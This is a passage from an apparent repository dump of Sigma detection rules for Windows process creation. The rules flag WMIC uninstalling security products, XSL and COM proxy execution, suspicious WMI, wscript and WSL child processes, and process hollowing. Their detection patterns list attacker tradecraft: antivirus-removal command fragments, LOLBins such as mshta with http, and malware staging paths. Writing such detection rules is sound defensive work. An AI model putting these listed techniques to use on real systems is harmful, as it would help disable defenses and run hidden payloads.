'call'\n            - 'uninstall'\n            - '/nointeractive'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'caption like '\n        CommandLine|contains:\n            - 'call delete'\n            - 'call terminate'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'process '\n            - 'where '\n            - 'delete'\n    selection_product:\n        CommandLine|contains:\n            - '%carbon%'\n            - '%cylance%'\n            - '%endpoint%'\n            - '%eset%'\n            - '%malware%'\n            - '%Sophos%'\n            - '%symantec%'\n            - 'Antivirus'\n            - 'AVG '\n            - 'Carbon Black'\n            - 'CarbonBlack'\n            - 'Cb Defense Sensor 64-bit'\n            - 'Crowdstrike Sensor'\n            - 'Cylance '\n            - 'Dell Threat Defense'\n            - 'DLP Endpoint'\n            - 'Endpoint Detection'\n            - 'Endpoint Protection'\n            - 'Endpoint Security'\n            - 'Endpoint Sensor'\n            - 'ESET File Security'\n            - 'LogRhythm System Monitor Service'\n            - 'Malwarebytes'\n            - 'McAfee Agent'\n            - 'Microsoft Security Client'\n            - 'Sophos Anti-Virus'\n            - 'Sophos AutoUpdate'\n            - 'Sophos Credential Store'\n            - 'Sophos Management Console'\n            - 'Sophos Management Database'\n            - 'Sophos Management Server'\n            - 'Sophos Remote Management System'\n            - 'Sophos Update Manager'\n            - 'Threat Protection'\n            - 'VirusScan'\n            - 'Webroot SecureAnywhere'\n            - 'Windows Defender'\n    condition: 1 of selection_cli_* and selection_product\nfalsepositives:\n    - Legitimate administration\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml",
    "content": "title: XSL Script Execution Via WMIC.EXE\nid: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\nrelated:\n    - id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32\n      type: similar\n    - id: 8d63dadf-b91b-4187-87b6-34a1114577ea\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of WMIC with the \"format\" flag to potentially load local XSL files.\n    Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\n    Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\nauthor: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel\ndate: 2019-10-21\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.t1047\n    - attack.t1220\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n        - Hashes|contains:  # Sysmon field hashes contains all types\n              - 'IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E'\n              - 'IMPHASH=37777A96245A3C74EB217308F3546F4C'\n              - 'IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206'\n              - 'IMPHASH=B12619881D79C3ACADF45E752A58554A'\n              - 'IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00'\n    selection_cmd:\n        CommandLine|contains|windash: '-format:'     # wmic process list -FORMAT /? or wmic process list /FORMAT /?\n    filter_main_known_format:\n        CommandLine|contains:\n            - 'Format:List'\n            - 'Format:htable'\n            - 'Format:hform'\n            - 'Format:table'\n            - 'Format:mof'\n            - 'Format:value'\n            - 'Format:rawxml'\n            - 'Format:xml'\n            - 'Format:csv'\n    filter_main_remote_operation: # Covered by 8d63dadf-b91b-4187-87b6-34a1114577ea\n        CommandLine|contains:\n            - '://'\n            - '\\\\\\\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.\n    - Static format arguments - https://petri.com/command-line-wmi-part-3\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml",
    "content": "title: WmiPrvSE Spawned A Process\nid: d21374ff-f574-44a7-9998-4a8c8bf33d7d\nrelated:\n    - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937\n      type: similar\n    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6\n      type: similar\nstatus: stable\ndescription: Detects WmiPrvSE spawning a process\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-15\nmodified: 2023-03-23\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WmiPrvSe.exe'\n    filter_logonid:\n        LogonId:\n            - '0x3e7'  # LUID 999 for SYSTEM\n            - 'null'   # too many false positives\n    filter_system_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_wmiprvse:\n        Image|endswith: '\\WmiPrvSE.exe'\n    filter_werfault:\n        Image|endswith: '\\WerFault.exe'\n    filter_null:  # some backends need the null value in a separate expression\n        LogonId: null\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - False positives are expected (e.g. in environments where WinRM is used legitimately)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml",
    "content": "title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell\nid: 692f0bec-83ba-4d04-af7e-e884a96059b6\nrelated:\n    - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937\n      type: similar\n    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d\n      type: similar\nstatus: stable\ndescription: Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.\nreferences:\n    - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e\nauthor: Markus Neis @Karneades\ndate: 2019-04-03\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\WmiPrvSE.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    condition: all of selection_*\nfalsepositives:\n    - AppvClient\n    - CCM\n    - WinRM\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml",
    "content": "title: Suspicious WmiPrvSE Child Process\nid: 8a582fe2-0882-4b89-a82a-da6b2dc32937\nrelated:\n    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6\n      type: similar\n    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d\n      type: similar\n    - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4\n      type: obsolete\nstatus: test\ndescription: Detects suspicious and uncommon child processes of WmiPrvSE\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\n    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\n    - https://twitter.com/ForensicITGuy/status/1334734244120309760\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-11-10\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1047\n    - attack.t1204.002\n    - attack.t1218.010\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\wbem\\WmiPrvSE.exe'\n    selection_children_1:\n        # TODO: Add more LOLBINs or suspicious processes that make sense in your environment\n        Image|endswith:\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\verclsid.exe'\n            - '\\wscript.exe'\n    selection_children_2:\n        # This is in a separate selection due to the nature of FP generated with CMD\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - 'cscript'\n            - 'mshta'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wscript'\n    filter_main_werfault:\n        Image|endswith: '\\WerFault.exe'\n    filter_main_wmiprvse:\n        Image|endswith: '\\WmiPrvSE.exe' # In some legitimate case WmiPrvSE was seen spawning itself\n    filter_main_msiexec:\n        Image|endswith: '\\msiexec.exe'\n        CommandLine|contains: '/i '\n    condition: selection_parent and 1 of selection_children_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml",
    "content": "title: UEFI Persistence Via Wpbbin - ProcessCreation\nid: 4abc0ec4-db5a-412f-9632-26659cddf145\nstatus: test\ndescription: Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section\nreferences:\n    - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c\n    - https://persistence-info.github.io/Data/wpbbin.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1542.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image: 'C:\\Windows\\System32\\wpbbin.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml",
    "content": "title: Potential Dropper Script Execution Via WScript/CScript\nid: cea72823-df4d-4567-950c-0b579eaf0846\nrelated:\n    - id: 1e33157c-53b1-41ad-bbcc-780b80b58288\n      type: similar\nstatus: test\ndescription: Detects wscript/cscript executions of scripts located in user directories\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://redcanary.com/blog/gootloader/\nauthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-01-30\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exec:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    selection_paths:\n        CommandLine|contains:\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    selection_ext:\n        CommandLine|contains:\n            - '.js'\n            - '.jse'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers might generate a similar behavior. An initial baseline is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml",
    "content": "title: Cscript/Wscript Potentially Suspicious Child Process\nid: b6676963-0353-4f88-90f5-36c20d443c6a\nstatus: test\ndescription: |\n    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.\n    Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.\nreferences:\n    - Internal Research\n    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_30.10.2023.txt\n    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt\nauthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')\ndate: 2023-05-15\nmodified: 2024-01-02\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    selection_cli_script_main:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    # Note: Add other combinations that are suspicious\n    selection_cli_script_option_mshta:\n        CommandLine|contains|all:\n            - 'mshta'\n            - 'http'\n    selection_cli_script_option_other:\n        CommandLine|contains:\n            - 'rundll32'\n            - 'regsvr32'\n            - 'msiexec'\n    selection_cli_standalone:\n        Image|endswith: '\\rundll32.exe'\n    filter_main_rundll32_known_exports:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - 'UpdatePerUserSystemParameters'\n            - 'PrintUIEntry'\n            - 'ClearMyTracksByProcess'\n    condition: selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml",
    "content": "title: Cscript/Wscript Uncommon Script Extension Execution\nid: 99b7460d-c9f1-40d7-a316-1f36f61d52ee\nstatus: test\ndescription: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2023-06-19\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'wscript.exe'\n              - 'cscript.exe'\n        - Image|endswith:\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n    selection_extension:\n        CommandLine|contains:\n            # Note: add additional potential suspicious extension\n            # We could specify the \"//E:\" flag to avoid typos by admin. But since that's prone to blind spots via the creation of assoc it's better not to include it\n            - '.csv'\n            - '.dat'\n            - '.doc'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.png'\n            - '.ppt'\n            - '.txt'\n            - '.xls'\n            - '.xml'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml",
    "content": "title: WSL Child Process Anomaly\nid: 2267fe65-0681-42ad-9a6d-46553d3f3480\nrelated:\n    - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule\n      type: derived\nstatus: test\ndescription: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/\n    - https://twitter.com/nas_bench/status/1535431474429808642\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-23\nmodified: 2023-08-15\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\wsl.exe'\n            - '\\wslhost.exe'\n    selection_children_images:\n        Image|endswith:\n            # Add more suspicious/uncommon \"lolbin\" processes\n            - '\\calc.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    selection_children_paths:\n        Image|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Temp\\'\n            - 'C:\\Temp\\'\n            - '\\Downloads\\'\n            - '\\Desktop\\'\n    condition: selection_parent and 1 of selection_children_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_installation.yml",
    "content": "title: Installation of WSL Kali-Linux\nid: eca8ae39-5c3c-4321-b538-9e64fe25822e\nstatus: experimental\ndescription: |\n    Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).\n    Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.\nreferences:\n    - https://medium.com/@redfanatic7/running-kali-linux-on-windows-51ad95166e6e\n    - https://learn.microsoft.com/en-us/windows/wsl/install\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-10\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wsl_img:\n        - Image|endswith: '\\wsl.exe'\n        - OriginalFileName: 'wsl'\n    selection_wsl_install:\n        CommandLine|contains:\n            - ' --install '\n            - ' -i '\n    selection_wsl_kali:\n        CommandLine|contains: 'kali'\n    condition: all of selection_wsl_*\nfalsepositives:\n    - Legitimate installation or usage of Kali Linux WSL by administrators or security teams\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_usage.yml",
    "content": "title: WSL Kali-Linux Usage\nid: 6f1a11aa-4b8a-4b7f-9e13-4d3e4ff0e0d4\nstatus: experimental\ndescription: Detects the use of Kali Linux through Windows Subsystem for Linux\nreferences:\n    - https://medium.com/@redfanatic7/running-kali-linux-on-windows-51ad95166e6e\n    - https://learn.microsoft.com/en-us/windows/wsl/install\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-10\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_appdata:\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\AppData\\Local\\packages\\KaliLinux'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe'\n    selection_img_windowsapps:\n        Image|contains: ':\\Program Files\\WindowsApps\\KaliLinux.'\n        Image|endswith: '\\kali.exe'\n    selection_kali_wsl_parent:\n        ParentImage|endswith:\n            - '\\wsl.exe'\n            - '\\wslhost.exe'\n    selection_kali_wsl_child:\n        - Image|contains:\n              - '\\kali.exe'\n              - '\\KaliLinux'\n        - CommandLine|contains:\n              - 'Kali.exe'\n              - 'Kali-linux'\n              - 'kalilinux'\n    filter_main_install_uninstall:\n        CommandLine|contains:\n            - ' -i '\n            - ' --install '\n            - ' --unregister '\n    condition: 1 of selection_img_* or all of selection_kali_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate installation or usage of Kali Linux WSL by administrators or security teams\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml",
    "content": "title: Windows Binary Executed From WSL\nid: ed825c86-c009-4014-b413-b76003e33d35\nstatus: test\ndescription: |\n    Detects the execution of Windows binaries from within a WSL instance.\n    This could be used to masquerade parent-child relationships\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|re: '[a-zA-Z]:\\\\'\n        CurrentDirectory|contains: '\\\\\\\\wsl.localhost' # Note: programs not supporting UNC paths (example: cmd.exe). Will default to another location\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml",
    "content": "title: Proxy Execution Via Wuauclt.EXE\nid: af77cf95-c469-471c-b6a0-946c685c4798\nrelated:\n    - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0\n      type: obsolete\n    - id: d7825193-b70a-48a4-b992-8b5b3015cc11\n      type: obsolete\nstatus: test\ndescription: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.\nreferences:\n    - https://dtm.uk/wuauclt/\n    - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team\ndate: 2020-10-12\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wuauclt.exe'\n        - OriginalFileName: 'wuauclt.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'UpdateDeploymentProvider'\n            - 'RunHandlerComServer'\n    filter_main_generic:\n        # Note: Please enhance this if you find the full path\n        CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '\n    filter_main_wuaueng:\n        # Note: Please enhance this if you find the full path\n        CommandLine|contains: ' wuaueng.dll '\n    filter_main_uus:\n        CommandLine|contains:\n            - ':\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId'\n            - ':\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId'\n    filter_main_winsxs:\n        CommandLine|contains|all:\n            - ':\\Windows\\WinSxS\\'\n            - '\\UpdateDeploy.dll /ClassId '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml",
    "content": "title: Suspicious Windows Update Agent Empty Cmdline\nid: 52d097e2-063e-4c9c-8fbb-855c8948d135\nstatus: test\ndescription: |\n    Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-26\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Wuauclt.exe'\n        - OriginalFileName: 'Wuauclt.exe'\n    selection_cli:\n        CommandLine|endswith:\n            - 'Wuauclt'\n            - 'Wuauclt.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml",
    "content": "title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths\nid: c74c0390-3e20-41fd-a69a-128f0275a5ea\nrelated:\n    - id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract \".cab\" files using the \"/extract\" argument from potentially suspicious paths.\nreferences:\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\n    - https://www.echotrail.io/insights/search/wusa.exe/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-11-28\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_root:\n        Image|endswith: '\\wusa.exe'\n        CommandLine|contains: '/extract:'\n    selection_paths:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Appdata\\Local\\Temp\\'\n            # - '\\Desktop\\'\n            # - '\\Downloads\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml",
    "content": "title: Wusa.EXE Executed By Parent Process Located In Suspicious Location\nid: ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99\nstatus: test\ndescription: |\n    Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.\n    Attackers could instantiate an instance of \"wusa.exe\" in order to bypass User Account Control (UAC). They can duplicate the access token from \"wusa.exe\" to gain elevated privileges.\nreferences:\n    - https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-26\nmodified: 2024-08-15\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\wusa.exe'\n    selection_paths_1:\n        ParentImage|contains:\n            # Note: Add additional suspicious locations to increase coverage\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Appdata\\Local\\Temp\\'\n            - '\\Temporary Internet'\n    selection_paths_2:\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    filter_main_msu:\n        # Note: We exclude MSU extension files. A better approach is to baseline installation of updates in your env to avoid false negatives.\n        CommandLine|contains: '.msu'\n    condition: selection_img and 1 of selection_paths_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_xwizard_execution_non_default_location.yml",
    "content": "title: Xwizard.EXE Execution From Non-Default Location\nid: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1\nstatus: test\ndescription: |\n    Detects the execution of Xwizard tool from a non-default directory.\n    When executed from a non-default directory, this utility can be abused in order to side load a custom version of \"xwizards.dll\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/\n    - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-09-20\nmodified: 2024-08-15\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\xwizard.exe'\n        - OriginalFileName: 'xwizard.exe'\n    filter_main_legit_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Windows installed on non-C drive\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_xwizard_runwizard_com_object_exec.yml",
    "content": "title: COM Object Execution via Xwizard.EXE\nid: 53d4bb30-3f36-4e8a-b078-69d36c4a79ff\nstatus: test\ndescription: |\n    Detects the execution of Xwizard tool with the \"RunWizard\" flag and a GUID like argument.\n    This utility can be abused in order to run custom COM object created in the registry.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/\n    - https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html\n    - https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\nauthor: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-07\nmodified: 2024-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine: 'RunWizard'\n        CommandLine|re: '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml",
    "content": "title: Potential Process Hollowing Activity\nid: c4b890e5-8d8c-4496-8c66-c805753817cd\nstatus: test\ndescription: Detects when a memory process image does not match the disk image, indicative of process hollowing.\nreferences:\n    - https://twitter.com/SecurePeacock/status/1486054048390332423?s=20\n    - https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S\ndate: 2022-01-25\nmodified: 2023-11-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.012\nlogsource:\n    product: windows\n    category: process_tampering\ndetection:\n    selection:\n        Type: 'Image is replaced'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\wbem\\WMIADAP.exe'\n            - ':\\Windows\\SysWOW64\\wbem\\WMIADAP.exe'\n    filter_optional_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_optional_edge:\n        Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml",
